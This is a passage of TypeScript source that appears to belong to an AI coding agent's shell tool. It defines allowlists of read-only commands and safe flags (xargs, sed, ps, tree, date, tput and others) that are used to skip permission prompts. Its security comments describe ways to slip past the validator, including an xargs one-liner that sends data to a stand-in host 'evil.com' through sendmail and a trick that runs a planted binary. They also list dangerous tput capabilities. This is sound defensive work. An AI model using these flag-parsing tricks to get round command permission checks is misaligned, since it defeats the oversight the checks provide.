readOnlyValidation.ts
1 import type { z } from 'zod/v4' 2 import { getOriginalCwd } from '../../bootstrap/state.js' 3 import { 4 extractOutputRedirections, 5 splitCommand_DEPRECATED, 6 } from '../../utils/bash/commands.js' 7 import { tryParseShellCommand } from '../../utils/bash/shellQuote.js' 8 import { getCwd } from '../../utils/cwd.js' 9 import { isCurrentDirectoryBareGitRepo } from '../../utils/git.js' 10 import type { PermissionResult } from '../../utils/permissions/PermissionResult.js' 11 import { getPlatform } from '../../utils/platform.js' 12 import { SandboxManager } from '../../utils/sandbox/sandbox-adapter.js' 13 import { 14 containsVulnerableUncPath, 15 DOCKER_READ_ONLY_COMMANDS, 16 EXTERNAL_READONLY_COMMANDS, 17 type FlagArgType, 18 GH_READ_ONLY_COMMANDS, 19 GIT_READ_ONLY_COMMANDS, 20 PYRIGHT_READ_ONLY_COMMANDS, 21 RIPGREP_READ_ONLY_COMMANDS, 22 validateFlags, 23 } from '../../utils/shell/readOnlyCommandValidation.js' 24 import type { BashTool } from './BashTool.js' 25 import { isNormalizedGitCommand } from './bashPermissions.js' 26 import { bashCommandIsSafe_DEPRECATED } from './bashSecurity.js' 27 import { 28 COMMAND_OPERATION_TYPE, 29 PATH_EXTRACTORS, 30 type PathCommand, 31 } from './pathValidation.js' 32 import { sedCommandIsAllowedByAllowlist } from './sedValidation.js' 33 34 // Unified command validation configuration system 35 type CommandConfig = { 36 // A Record mapping from the command (e.g. `xargs` or `git diff`) to its safe flags and the values they accept 37 safeFlags: Record<string, FlagArgType> 38 // An optional regex that is used for additional validation beyond flag parsing 39 regex?: RegExp 40 // An optional callback for additional custom validation logic. Returns true if the command is dangerous, 41 // false if it appears to be safe. Meant to be used in conjunction with the safeFlags-based validation. 42 additionalCommandIsDangerousCallback?: ( 43 rawCommand: string, 44 args: string[], 45 ) => boolean 46 // When false, the tool does NOT respect POSIX `--` end-of-options. 47 // validateFlags will continue checking flags after `--` instead of breaking. 48 // Default: true (most tools respect `--`). 49 respectsDoubleDash?: boolean 50 } 51 52 // Shared safe flags for fd and fdfind (Debian/Ubuntu package name) 53 // SECURITY: -x/--exec and -X/--exec-batch are deliberately excluded — 54 // they execute arbitrary commands for each search result. 55 const FD_SAFE_FLAGS: Record<string, FlagArgType> = { 56 '-h': 'none', 57 '--help': 'none', 58 '-V': 'none', 59 '--version': 'none', 60 '-H': 'none', 61 '--hidden': 'none', 62 '-I': 'none', 63 '--no-ignore': 'none', 64 '--no-ignore-vcs': 'none', 65 '--no-ignore-parent': 'none', 66 '-s': 'none', 67 '--case-sensitive': 'none', 68 '-i': 'none', 69 '--ignore-case': 'none', 70 '-g': 'none', 71 '--glob': 'none', 72 '--regex': 'none', 73 '-F': 'none', 74 '--fixed-strings': 'none', 75 '-a': 'none', 76 '--absolute-path': 'none', 77 // SECURITY: -l/--list-details EXCLUDED — internally executes `ls` as subprocess (same 78 // pathway as --exec-batch). PATH hijacking risk if malicious `ls` is on PATH. 79 '-L': 'none', 80 '--follow': 'none', 81 '-p': 'none', 82 '--full-path': 'none', 83 '-0': 'none', 84 '--print0': 'none', 85 '-d': 'number', 86 '--max-depth': 'number', 87 '--min-depth': 'number', 88 '--exact-depth': 'number', 89 '-t': 'string', 90 '--type': 'string', 91 '-e': 'string', 92 '--extension': 'string', 93 '-S': 'string', 94 '--size': 'string', 95 '--changed-within': 'string', 96 '--changed-before': 'string', 97 '-o': 'string', 98 '--owner': 'string', 99 '-E': 'string', 100 '--exclude': 'string', 101 '--ignore-file': 'string', 102 '-c': 'string', 103 '--color': 'string', 104 '-j': 'number', 105 '--threads': 'number', 106 '--max-buffer-time': 'string', 107 '--max-results': 'number', 108 '-1': 'none', 109 '-q': 'none', 110 '--quiet': 'none', 111 '--show-errors': 'none', 112 '--strip-cwd-prefix': 'none', 113 '--one-file-system': 'none', 114 '--prune': 'none', 115 '--search-path': 'string', 116 '--base-directory': 'string', 117 '--path-separator': 'string', 118 '--batch-size': 'number', 119 '--no-require-git': 'none', 120 '--hyperlink': 'string', 121 '--and': 'string', 122 '--format': 'string', 123 } 124 125 // Central configuration for allowlist-based command validation 126 // All commands and flags here should only allow reading files. They should not 127 // allow writing to files, executing code, or creating network requests. 128 const COMMAND_ALLOWLIST: Record<string, CommandConfig> = { 129 xargs: { 130 safeFlags: { 131 '-I': '{}', 132 // SECURITY: `-i` and `-e` (lowercase) REMOVED — both use GNU getopt 133 // optional-attached-arg semantics (`i::`, `e::`). The arg MUST be 134 // attached (`-iX`, `-eX`); space-separated (`-i X`, `-e X`) means the 135 // flag takes NO arg and `X` becomes the next positional (target command). 136 // 137 // `-i` (`i::` — optional replace-str): 138 // echo /usr/sbin/sendm | xargs -it tail a@evil.com 139 // validator: -it bundle (both 'none') OK, tail ∈ SAFE_TARGET → break 140 // GNU: -i replace-str=t, tail → /usr/sbin/sendmail → NETWORK EXFIL 141 // 142 // `-e` (`e::` — optional eof-str): 143 // cat data | xargs -e EOF echo foo 144 // validator: -e consumes 'EOF' as arg (type 'EOF'), echo ∈ SAFE_TARGET 145 // GNU: -e no attached arg → no eof-str, 'EOF' is the TARGET COMMAND 146 // → executes binary named EOF from PATH → CODE EXEC (malicious repo) 147 // 148 // Use uppercase `-I {}` (mandatory arg) and `-E EOF` (POSIX, mandatory 149 // arg) instead — both validator and xargs agree on argument consumption. 150 // `-i`/`-e` are deprecated (GNU: "use -I instead" / "use -E instead"). 151 '-n': 'number', 152 '-P': 'number', 153 '-L': 'number', 154 '-s': 'number', 155 '-E': 'EOF', // POSIX, MANDATORY separate arg — validator & xargs agree 156 '-0': 'none', 157 '-t': 'none', 158 '-r': 'none', 159 '-x': 'none', 160 '-d': 'char', 161 }, 162 }, 163 // All git read-only commands from shared validation map 164 ...GIT_READ_ONLY_COMMANDS, 165 file: { 166 safeFlags: { 167 // Output format flags 168 '--brief': 'none', 169 '-b': 'none', 170 '--mime': 'none', 171 '-i': 'none', 172 '--mime-type': 'none', 173 '--mime-encoding': 'none', 174 '--apple': 'none', 175 // Behavior flags 176 '--check-encoding': 'none', 177 '-c': 'none', 178 '--exclude': 'string', 179 '--exclude-quiet': 'string', 180 '--print0': 'none', 181 '-0': 'none', 182 '-f': 'string', 183 '-F': 'string', 184 '--separator': 'string', 185 '--help': 'none', 186 '--version': 'none', 187 '-v': 'none', 188 // Following/dereferencing 189 '--no-dereference': 'none', 190 '-h': 'none', 191 '--dereference': 'none', 192 '-L': 'none', 193 // Magic file options (safe when just reading) 194 '--magic-file': 'string', 195 '-m': 'string', 196 // Other safe options 197 '--keep-going': 'none', 198 '-k': 'none', 199 '--list': 'none', 200 '-l': 'none', 201 '--no-buffer': 'none', 202 '-n': 'none', 203 '--preserve-date': 'none', 204 '-p': 'none', 205 '--raw': 'none', 206 '-r': 'none', 207 '-s': 'none', 208 '--special-files': 'none', 209 // Uncompress flag for archives 210 '--uncompress': 'none', 211 '-z': 'none', 212 }, 213 }, 214 sed: { 215 safeFlags: { 216 // Expression flags 217 '--expression': 'string', 218 '-e': 'string', 219 // Output control 220 '--quiet': 'none', 221 '--silent': 'none', 222 '-n': 'none', 223 // Extended regex 224 '--regexp-extended': 'none', 225 '-r': 'none', 226 '--posix': 'none', 227 '-E': 'none', 228 // Line handling 229 '--line-length': 'number', 230 '-l': 'number', 231 '--zero-terminated': 'none', 232 '-z': 'none', 233 '--separate': 'none', 234 '-s': 'none', 235 '--unbuffered': 'none', 236 '-u': 'none', 237 // Debugging/help 238 '--debug': 'none', 239 '--help': 'none', 240 '--version': 'none', 241 }, 242 additionalCommandIsDangerousCallback: ( 243 rawCommand: string, 244 _args: string[], 245 ) => !sedCommandIsAllowedByAllowlist(rawCommand), 246 }, 247 sort: { 248 safeFlags: { 249 // Sorting options 250 '--ignore-leading-blanks': 'none', 251 '-b': 'none', 252 '--dictionary-order': 'none', 253 '-d': 'none', 254 '--ignore-case': 'none', 255 '-f': 'none', 256 '--general-numeric-sort': 'none', 257 '-g': 'none', 258 '--human-numeric-sort': 'none', 259 '-h': 'none', 260 '--ignore-nonprinting': 'none', 261 '-i': 'none', 262 '--month-sort': 'none', 263 '-M': 'none', 264 '--numeric-sort': 'none', 265 '-n': 'none', 266 '--random-sort': 'none', 267 '-R': 'none', 268 '--reverse': 'none', 269 '-r': 'none', 270 '--sort': 'string', 271 '--stable': 'none', 272 '-s': 'none', 273 '--unique': 'none', 274 '-u': 'none', 275 '--version-sort': 'none', 276 '-V': 'none', 277 '--zero-terminated': 'none', 278 '-z': 'none', 279 // Key specifications 280 '--key': 'string', 281 '-k': 'string', 282 '--field-separator': 'string', 283 '-t': 'string', 284 // Checking 285 '--check': 'none', 286 '-c': 'none', 287 '--check-char-order': 'none', 288 '-C': 'none', 289 // Merging 290 '--merge': 'none', 291 '-m': 'none', 292 // Buffer size 293 '--buffer-size': 'string', 294 '-S': 'string', 295 // Parallel processing 296 '--parallel': 'number', 297 // Batch size 298 '--batch-size': 'number', 299 // Help and version 300 '--help': 'none', 301 '--version': 'none', 302 }, 303 }, 304 man: { 305 safeFlags: { 306 // Safe display options 307 '-a': 'none', // Display all manual pages 308 '--all': 'none', // Same as -a 309 '-d': 'none', // Debug mode 310 '-f': 'none', // Emulate whatis 311 '--whatis': 'none', // Same as -f 312 '-h': 'none', // Help 313 '-k': 'none', // Emulate apropos 314 '--apropos': 'none', // Same as -k 315 '-l': 'string', // Local file (safe for reading, Linux only) 316 '-w': 'none', // Display location instead of content 317 318 // Safe formatting options 319 '-S': 'string', // Restrict manual sections 320 '-s': 'string', // Same as -S for whatis/apropos mode 321 }, 322 }, 323 // help command - only allow bash builtin help flags to prevent attacks when 324 // help is aliased to man (e.g., in oh-my-zsh common-aliases plugin). 325 // man's -P flag allows arbitrary command execution via pager. 326 help: { 327 safeFlags: { 328 '-d': 'none', // Output short description for each topic 329 '-m': 'none', // Display usage in pseudo-manpage format 330 '-s': 'none', // Output only a short usage synopsis 331 }, 332 }, 333 netstat: { 334 safeFlags: { 335 // Safe display options 336 '-a': 'none', // Show all sockets 337 '-L': 'none', // Show listen queue sizes 338 '-l': 'none', // Print full IPv6 address 339 '-n': 'none', // Show network addresses as numbers 340 341 // Safe filtering options 342 '-f': 'string', // Address family (inet, inet6, unix, vsock) 343 344 // Safe interface options 345 '-g': 'none', // Show multicast group membership 346 '-i': 'none', // Show interface state 347 '-I': 'string', // Specific interface 348 349 // Safe statistics options 350 '-s': 'none', // Show per-protocol statistics 351 352 // Safe routing options 353 '-r': 'none', // Show routing tables 354 355 // Safe mbuf options 356 '-m': 'none', // Show memory management statistics 357 358 // Safe other options 359 '-v': 'none', // Increase verbosity 360 }, 361 }, 362 ps: { 363 safeFlags: { 364 // UNIX-style process selection (these are safe) 365 '-e': 'none', // Select all processes 366 '-A': 'none', // Select all processes (same as -e) 367 '-a': 'none', // Select all with tty except session leaders 368 '-d': 'none', // Select all except session leaders 369 '-N': 'none', // Negate selection 370 '--deselect': 'none', 371 372 // UNIX-style output format (safe, doesn't show env) 373 '-f': 'none', // Full format 374 '-F': 'none', // Extra full format 375 '-l': 'none', // Long format 376 '-j': 'none', // Jobs format 377 '-y': 'none', // Don't show flags 378 379 // Output modifiers (safe ones) 380 '-w': 'none', // Wide output 381 '-ww': 'none', // Unlimited width 382 '--width': 'number', 383 '-c': 'none', // Show scheduler info 384 '-H': 'none', // Show process hierarchy 385 '--forest': 'none', 386 '--headers': 'none', 387 '--no-headers': 'none', 388 '-n': 'string', // Set namelist file 389 '--sort': 'string', 390 391 // Thread display 392 '-L': 'none', // Show threads 393 '-T': 'none', // Show threads 394 '-m': 'none', // Show threads after processes 395 396 // Process selection by criteria 397 '-C': 'string', // By command name 398 '-G': 'string', // By real group ID 399 '-g': 'string', // By session or effective group 400 '-p': 'string', // By PID 401 '--pid': 'string', 402 '-q': 'string', // Quick mode by PID 403 '--quick-pid': 'string', 404 '-s': 'string', // By session ID 405 '--sid': 'string', 406 '-t': 'string', // By tty 407 '--tty': 'string', 408 '-U': 'string', // By real user ID 409 '-u': 'string', // By effective user ID 410 '--user': 'string', 411 412 // Help/version 413 '--help': 'none', 414 '--info': 'none', 415 '-V': 'none', 416 '--version': 'none', 417 }, 418 // Block BSD-style 'e' modifier which shows environment variables 419 // BSD options are letter-only tokens without a leading dash 420 additionalCommandIsDangerousCallback: ( 421 _rawCommand: string, 422 args: string[], 423 ) => { 424 // Check for BSD-style 'e' in letter-only tokens (not -e which is UNIX-style) 425 // A BSD-style option is a token of only letters (no leading dash) containing 'e' 426 return args.some( 427 a => !a.startsWith('-') && /^[a-zA-Z]*e[a-zA-Z]*$/.test(a), 428 ) 429 }, 430 }, 431 base64: { 432 respectsDoubleDash: false, // macOS base64 does not respect POSIX -- 433 safeFlags: { 434 // Safe decode options 435 '-d': 'none', // Decode 436 '-D': 'none', // Decode (macOS) 437 '--decode': 'none', // Decode 438 439 // Safe formatting options 440 '-b': 'number', // Break lines at num (macOS) 441 '--break': 'number', // Break lines at num (macOS) 442 '-w': 'number', // Wrap lines at COLS (Linux) 443 '--wrap': 'number', // Wrap lines at COLS (Linux) 444 445 // Safe input options (read from file, not write) 446 '-i': 'string', // Input file (safe for reading) 447 '--input': 'string', // Input file (safe for reading) 448 449 // Safe misc options 450 '--ignore-garbage': 'none', // Ignore non-alphabet chars when decoding (Linux) 451 '-h': 'none', // Help 452 '--help': 'none', // Help 453 '--version': 'none', // Version 454 }, 455 }, 456 grep: { 457 safeFlags: { 458 // Pattern flags 459 '-e': 'string', // Pattern 460 '--regexp': 'string', 461 '-f': 'string', // File with patterns 462 '--file': 'string', 463 '-F': 'none', // Fixed strings 464 '--fixed-strings': 'none', 465 '-G': 'none', // Basic regexp (default) 466 '--basic-regexp': 'none', 467 '-E': 'none', // Extended regexp 468 '--extended-regexp': 'none', 469 '-P': 'none', // Perl regexp 470 '--perl-regexp': 'none', 471 472 // Matching control 473 '-i': 'none', // Ignore case 474 '--ignore-case': 'none', 475 '--no-ignore-case': 'none', 476 '-v': 'none', // Invert match 477 '--invert-match': 'none', 478 '-w': 'none', // Word regexp 479 '--word-regexp': 'none', 480 '-x': 'none', // Line regexp 481 '--line-regexp': 'none', 482 483 // Output control 484 '-c': 'none', // Count 485 '--count': 'none', 486 '--color': 'string', 487 '--colour': 'string', 488 '-L': 'none', // Files without match 489 '--files-without-match': 'none', 490 '-l': 'none', // Files with matches 491 '--files-with-matches': 'none', 492 '-m': 'number', // Max count 493 '--max-count': 'number', 494 '-o': 'none', // Only matching 495 '--only-matching': 'none', 496 '-q': 'none', // Quiet 497 '--quiet': 'none', 498 '--silent': 'none', 499 '-s': 'none', // No messages 500 '--no-messages': 'none', 501 502 // Output line prefix 503 '-b': 'none', // Byte offset 504 '--byte-offset': 'none', 505 '-H': 'none', // With filename 506 '--with-filename': 'none', 507 '-h': 'none', // No filename 508 '--no-filename': 'none', 509 '--label': 'string', 510 '-n': 'none', // Line number 511 '--line-number': 'none', 512 '-T': 'none', // Initial tab 513 '--initial-tab': 'none', 514 '-u': 'none', // Unix byte offsets 515 '--unix-byte-offsets': 'none', 516 '-Z': 'none', // Null after filename 517 '--null': 'none', 518 '-z': 'none', // Null data 519 '--null-data': 'none', 520 521 // Context control 522 '-A': 'number', // After context 523 '--after-context': 'number', 524 '-B': 'number', // Before context 525 '--before-context': 'number', 526 '-C': 'number', // Context 527 '--context': 'number', 528 '--group-separator': 'string', 529 '--no-group-separator': 'none', 530 531 // File and directory selection 532 '-a': 'none', // Text (process binary as text) 533 '--text': 'none', 534 '--binary-files': 'string', 535 '-D': 'string', // Devices 536 '--devices': 'string', 537 '-d': 'string', // Directories 538 '--directories': 'string', 539 '--exclude': 'string', 540 '--exclude-from': 'string', 541 '--exclude-dir': 'string', 542 '--include': 'string', 543 '-r': 'none', // Recursive 544 '--recursive': 'none', 545 '-R': 'none', // Dereference-recursive 546 '--dereference-recursive': 'none', 547 548 // Other options 549 '--line-buffered': 'none', 550 '-U': 'none', // Binary 551 '--binary': 'none', 552 553 // Help and version 554 '--help': 'none', 555 '-V': 'none', 556 '--version': 'none', 557 }, 558 }, 559 ...RIPGREP_READ_ONLY_COMMANDS, 560 // Checksum commands - these only read files and compute/verify hashes 561 // All flags are safe as they only affect output format or verification behavior 562 sha256sum: { 563 safeFlags: { 564 // Mode flags 565 '-b': 'none', // Binary mode 566 '--binary': 'none', 567 '-t': 'none', // Text mode 568 '--text': 'none', 569 570 // Check/verify flags 571 '-c': 'none', // Verify checksums from file 572 '--check': 'none', 573 '--ignore-missing': 'none', // Ignore missing files during check 574 '--quiet': 'none', // Quiet mode during check 575 '--status': 'none', // Don't output, exit code shows success 576 '--strict': 'none', // Exit non-zero for improperly formatted lines 577 '-w': 'none', // Warn about improperly formatted lines 578 '--warn': 'none', 579 580 // Output format flags 581 '--tag': 'none', // BSD-style output 582 '-z': 'none', // End output lines with NUL 583 '--zero': 'none', 584 585 // Help and version 586 '--help': 'none', 587 '--version': 'none', 588 }, 589 }, 590 sha1sum: { 591 safeFlags: { 592 // Mode flags 593 '-b': 'none', // Binary mode 594 '--binary': 'none', 595 '-t': 'none', // Text mode 596 '--text': 'none', 597 598 // Check/verify flags 599 '-c': 'none', // Verify checksums from file 600 '--check': 'none', 601 '--ignore-missing': 'none', // Ignore missing files during check 602 '--quiet': 'none', // Quiet mode during check 603 '--status': 'none', // Don't output, exit code shows success 604 '--strict': 'none', // Exit non-zero for improperly formatted lines 605 '-w': 'none', // Warn about improperly formatted lines 606 '--warn': 'none', 607 608 // Output format flags 609 '--tag': 'none', // BSD-style output 610 '-z': 'none', // End output lines with NUL 611 '--zero': 'none', 612 613 // Help and version 614 '--help': 'none', 615 '--version': 'none', 616 }, 617 }, 618 md5sum: { 619 safeFlags: { 620 // Mode flags 621 '-b': 'none', // Binary mode 622 '--binary': 'none', 623 '-t': 'none', // Text mode 624 '--text': 'none', 625 626 // Check/verify flags 627 '-c': 'none', // Verify checksums from file 628 '--check': 'none', 629 '--ignore-missing': 'none', // Ignore missing files during check 630 '--quiet': 'none', // Quiet mode during check 631 '--status': 'none', // Don't output, exit code shows success 632 '--strict': 'none', // Exit non-zero for improperly formatted lines 633 '-w': 'none', // Warn about improperly formatted lines 634 '--warn': 'none', 635 636 // Output format flags 637 '--tag': 'none', // BSD-style output 638 '-z': 'none', // End output lines with NUL 639 '--zero': 'none', 640 641 // Help and version 642 '--help': 'none', 643 '--version': 'none', 644 }, 645 }, 646 // tree command - moved from READONLY_COMMAND_REGEXES to allow flags and path arguments 647 // -o/--output writes to a file, so it's excluded. All other flags are display/filter options. 648 tree: { 649 safeFlags: { 650 // Listing options 651 '-a': 'none', // All files 652 '-d': 'none', // Directories only 653 '-l': 'none', // Follow symlinks 654 '-f': 'none', // Full path prefix 655 '-x': 'none', // Stay on current filesystem 656 '-L': 'number', // Max depth 657 // SECURITY: -R REMOVED. tree -R combined with -H (HTML mode) and -L (depth) 658 // WRITES 00Tree.html files to every subdirectory at the depth boundary. 659 // From man tree (< 2.1.0): "-R — at each of them execute tree again 660 // adding `-o 00Tree.html` as a new option." The comment "Rerun at max 661 // depth" was misleading — the "rerun" includes a hardcoded -o file write. 662 // `tree -R -H . -L 2 /path` → writes /path/<subdir>/00Tree.html for each 663 // subdir at depth 2. FILE WRITE, zero permissions. 664 '-P': 'string', // Include pattern 665 '-I': 'string', // Exclude pattern 666 '--gitignore': 'none', 667 '--gitfile': 'string', 668 '--ignore-case': 'none', 669 '--matchdirs': 'none', 670 '--metafirst': 'none', 671 '--prune': 'none', 672 '--info': 'none', 673 '--infofile': 'string', 674 '--noreport': 'none', 675 '--charset': 'string', 676 '--filelimit': 'number', 677 // File display options 678 '-q': 'none', // Non-printable as ? 679 '-N': 'none', // Non-printable as-is 680 '-Q': 'none', // Quote filenames 681 '-p': 'none', // Protections 682 '-u': 'none', // Owner 683 '-g': 'none', // Group 684 '-s': 'none', // Size bytes 685 '-h': 'none', // Human-readable sizes 686 '--si': 'none', 687 '--du': 'none', 688 '-D': 'none', // Last modification time 689 '--timefmt': 'string', 690 '-F': 'none', // Append indicator 691 '--inodes': 'none', 692 '--device': 'none', 693 // Sorting options 694 '-v': 'none', // Version sort 695 '-t': 'none', // Sort by mtime 696 '-c': 'none', // Sort by ctime 697 '-U': 'none', // Unsorted 698 '-r': 'none', // Reverse sort 699 '--dirsfirst': 'none', 700 '--filesfirst': 'none', 701 '--sort': 'string', 702 // Graphics/output options 703 '-i': 'none', // No indentation lines 704 '-A': 'none', // ANSI line graphics 705 '-S': 'none', // CP437 line graphics 706 '-n': 'none', // No color 707 '-C': 'none', // Color 708 '-X': 'none', // XML output 709 '-J': 'none', // JSON output 710 '-H': 'string', // HTML output with base HREF 711 '--nolinks': 'none', 712 '--hintro': 'string', 713 '--houtro': 'string', 714 '-T': 'string', // HTML title 715 '--hyperlink': 'none', 716 '--scheme': 'string', 717 '--authority': 'string', 718 // Input options (read from file, not write) 719 '--fromfile': 'none', 720 '--fromtabfile': 'none', 721 '--fflinks': 'none', 722 // Help and version 723 '--help': 'none', 724 '--version': 'none', 725 }, 726 }, 727 // date command - moved from READONLY_COMMANDS because -s/--set can set system time 728 // Also -f/--file can be used to read dates from file and set time 729 // We only allow safe display options 730 date: { 731 safeFlags: { 732 // Display options (safe - don't modify system time) 733 '-d': 'string', // --date=STRING - display time described by STRING 734 '--date': 'string', 735 '-r': 'string', // --reference=FILE - display file's modification time 736 '--reference': 'string', 737 '-u': 'none', // --utc - use UTC 738 '--utc': 'none', 739 '--universal': 'none', 740 // Output format options 741 '-I': 'none', // --iso-8601 (can have optional argument, but none type handles bare flag) 742 '--iso-8601': 'string', 743 '-R': 'none', // --rfc-email 744 '--rfc-email': 'none', 745 '--rfc-3339': 'string', 746 // Debug/help 747 '--debug': 'none', 748 '--help': 'none', 749 '--version': 'none', 750 }, 751 // Dangerous flags NOT included (blocked by omission): 752 // -s / --set - sets system time 753 // -f / --file - reads dates from file (can be used to set time in batch) 754 // CRITICAL: date positional args in format MMDDhhmm[[CC]YY][.ss] set system time 755 // Use callback to verify positional args start with + (format strings like +"%Y-%m-%d") 756 additionalCommandIsDangerousCallback: ( 757 _rawCommand: string, 758 args: string[], 759 ) => { 760 // args are already parsed tokens after "date" 761 // Flags that require an argument 762 const flagsWithArgs = new Set([ 763 '-d', 764 '--date', 765 '-r', 766 '--reference', 767 '--iso-8601', 768 '--rfc-3339', 769 ]) 770 let i = 0 771 while (i < args.length) { 772 const token = args[i]! 773 // Skip flags and their arguments 774 if (token.startsWith('--') && token.includes('=')) { 775 // Long flag with =value, already consumed 776 i++ 777 } else if (token.startsWith('-')) { 778 // Flag - check if it takes an argument 779 if (flagsWithArgs.has(token)) { 780 i += 2 // Skip flag and its argument 781 } else { 782 i++ // Just skip the flag 783 } 784 } else { 785 // Positional argument - must start with + for format strings 786 // Anything else (like MMDDhhmm) could set system time 787 if (!token.startsWith('+')) { 788 return true // Dangerous 789 } 790 i++ 791 } 792 } 793 return false // Safe 794 }, 795 }, 796 // hostname command - moved from READONLY_COMMANDS because positional args set hostname 797 // Also -F/--file sets hostname from file, -b/--boot sets default hostname 798 // We only allow safe display options and BLOCK any positional arguments 799 hostname: { 800 safeFlags: { 801 // Display options only (safe) 802 '-f': 'none', // --fqdn - display FQDN 803 '--fqdn': 'none', 804 '--long': 'none', 805 '-s': 'none', // --short - display short name 806 '--short': 'none', 807 '-i': 'none', // --ip-address 808 '--ip-address': 'none', 809 '-I': 'none', // --all-ip-addresses 810 '--all-ip-addresses': 'none', 811 '-a': 'none', // --alias 812 '--alias': 'none', 813 '-d': 'none', // --domain 814 '--domain': 'none', 815 '-A': 'none', // --all-fqdns 816 '--all-fqdns': 'none', 817 '-v': 'none', // --verbose 818 '--verbose': 'none', 819 '-h': 'none', // --help 820 '--help': 'none', 821 '-V': 'none', // --version 822 '--version': 'none', 823 }, 824 // CRITICAL: Block any positional arguments - they set the hostname 825 // Also block -F/--file, -b/--boot, -y/--yp/--nis (not in safeFlags = blocked) 826 // Use regex to ensure no positional args after flags 827 regex: /^hostname(?:\s+(?:-[a-zA-Z]|--[a-zA-Z-]+))*\s*$/, 828 }, 829 // info command - moved from READONLY_COMMANDS because -o/--output writes to files 830 // Also --dribble writes keystrokes to file, --init-file loads custom config 831 // We only allow safe display/navigation options 832 info: { 833 safeFlags: { 834 // Navigation/display options (safe) 835 '-f': 'string', // --file - specify manual file to read 836 '--file': 'string', 837 '-d': 'string', // --directory - search path 838 '--directory': 'string', 839 '-n': 'string', // --node - specify node 840 '--node': 'string', 841 '-a': 'none', // --all 842 '--all': 'none', 843 '-k': 'string', // --apropos - search 844 '--apropos': 'string', 845 '-w': 'none', // --where - show location 846 '--where': 'none', 847 '--location': 'none', 848 '--show-options': 'none', 849 '--vi-keys': 'none', 850 '--subnodes': 'none', 851 '-h': 'none', 852 '--help': 'none', 853 '--usage': 'none', 854 '--version': 'none', 855 }, 856 // Dangerous flags NOT included (blocked by omission): 857 // -o / --output - writes output to file 858 // --dribble - records keystrokes to file 859 // --init-file - loads custom config (potential code execution) 860 // --restore - replays keystrokes from file 861 }, 862 863 lsof: { 864 safeFlags: { 865 '-?': 'none', 866 '-h': 'none', 867 '-v': 'none', 868 '-a': 'none', 869 '-b': 'none', 870 '-C': 'none', 871 '-l': 'none', 872 '-n': 'none', 873 '-N': 'none', 874 '-O': 'none', 875 '-P': 'none', 876 '-Q': 'none', 877 '-R': 'none', 878 '-t': 'none', 879 '-U': 'none', 880 '-V': 'none', 881 '-X': 'none', 882 '-H': 'none', 883 '-E': 'none', 884 '-F': 'none', 885 '-g': 'none', 886 '-i': 'none', 887 '-K': 'none', 888 '-L': 'none', 889 '-o': 'none', 890 '-r': 'none', 891 '-s': 'none', 892 '-S': 'none', 893 '-T': 'none', 894 '-x': 'none', 895 '-A': 'string', 896 '-c': 'string', 897 '-d': 'string', 898 '-e': 'string', 899 '-k': 'string', 900 '-p': 'string', 901 '-u': 'string', 902 // OMITTED (writes to disk): -D (device cache file build/update) 903 }, 904 // Block +m (create mount supplement file) — writes to disk. 905 // +prefix flags are treated as positional args by validateFlags, 906 // so we must catch them here. lsof accepts +m<path> (attached path, no space) 907 // with both absolute (+m/tmp/evil) and relative (+mfoo, +m.evil) paths. 908 additionalCommandIsDangerousCallback: (_rawCommand, args) => 909 args.some(a => a === '+m' || a.startsWith('+m')), 910 }, 911 912 pgrep: { 913 safeFlags: { 914 '-d': 'string', 915 '--delimiter': 'string', 916 '-l': 'none', 917 '--list-name': 'none', 918 '-a': 'none', 919 '--list-full': 'none', 920 '-v': 'none', 921 '--inverse': 'none', 922 '-w': 'none', 923 '--lightweight': 'none', 924 '-c': 'none', 925 '--count': 'none', 926 '-f': 'none', 927 '--full': 'none', 928 '-g': 'string', 929 '--pgroup': 'string', 930 '-G': 'string', 931 '--group': 'string', 932 '-i': 'none', 933 '--ignore-case': 'none', 934 '-n': 'none', 935 '--newest': 'none', 936 '-o': 'none', 937 '--oldest': 'none', 938 '-O': 'string', 939 '--older': 'string', 940 '-P': 'string', 941 '--parent': 'string', 942 '-s': 'string', 943 '--session': 'string', 944 '-t': 'string', 945 '--terminal': 'string', 946 '-u': 'string', 947 '--euid': 'string', 948 '-U': 'string', 949 '--uid': 'string', 950 '-x': 'none', 951 '--exact': 'none', 952 '-F': 'string', 953 '--pidfile': 'string', 954 '-L': 'none', 955 '--logpidfile': 'none', 956 '-r': 'string', 957 '--runstates': 'string', 958 '--ns': 'string', 959 '--nslist': 'string', 960 '--help': 'none', 961 '-V': 'none', 962 '--version': 'none', 963 }, 964 }, 965 966 tput: { 967 safeFlags: { 968 '-T': 'string', 969 '-V': 'none', 970 '-x': 'none', 971 // SECURITY: -S (read capability names from stdin) deliberately EXCLUDED. 972 // It must NOT be in safeFlags because validateFlags unbundles combined 973 // short flags (e.g., -xS → -x + -S), but the callback receives the raw 974 // token '-xS' and only checks exact match 'token === "-S"'. Excluding -S 975 // from safeFlags ensures validateFlags rejects it (bundled or not) before 976 // the callback runs. The callback's -S check is defense-in-depth. 977 }, 978 additionalCommandIsDangerousCallback: ( 979 _rawCommand: string, 980 args: string[], 981 ) => { 982 // Capabilities that modify terminal state or could be harmful. 983 // init/reset run iprog (arbitrary code from terminfo) and modify tty settings. 984 // rs1/rs2/rs3/is1/is2/is3 are the individual reset/init sequences that 985 // init/reset invoke internally — rs1 sends ESC c (full terminal reset). 986 // clear erases scrollback (evidence destruction). mc5/mc5p activate media copy 987 // (redirect output to printer device). smcup/rmcup manipulate screen buffer. 988 // pfkey/pfloc/pfx/pfxl program function keys — pfloc executes strings locally. 989 // rf is reset file (analogous to if/init_file). 990 const DANGEROUS_CAPABILITIES = new Set([ 991 'init', 992 'reset', 993 'rs1', 994 'rs2', 995 'rs3', 996 'is1', 997 'is2', 998 'is3', 999 'iprog', 1000 'if', 1001 'rf', 1002 'clear', 1003 'flash', 1004 'mc0', 1005 'mc4', 1006 'mc5', 1007 'mc5i', 1008 'mc5p', 1009 'pfkey', 1010 'pfloc', 1011 'pfx', 1012 'pfxl', 1013 'smcup', 1014 'rmcup', 1015 ]) 1016 const flagsWithArgs = new Set(['-T']) 1017 let i = 0 1018 let afterDoubleDash = false 1019 while (i < args.length) { 1020 const token = args[i]! 1021 if (token === '--') { 1022 afterDoubleDash = true 1023 i++ 1024 } else if (!afterDoubleDash && token.startsWith('-')) { 1025 // Defense-in-depth: block -S even if it somehow passes validateFlags 1026 if (token === '-S') return true 1027 // Also check for -S bundled with other flags (e.g., -xS) 1028 if ( 1029 !token.startsWith('--') && 1030 token.length > 2 && 1031 token.includes('S') 1032 ) 1033 return true 1034 if (flagsWithArgs.has(token)) { 1035 i += 2 1036 } else { 1037 i++ 1038 } 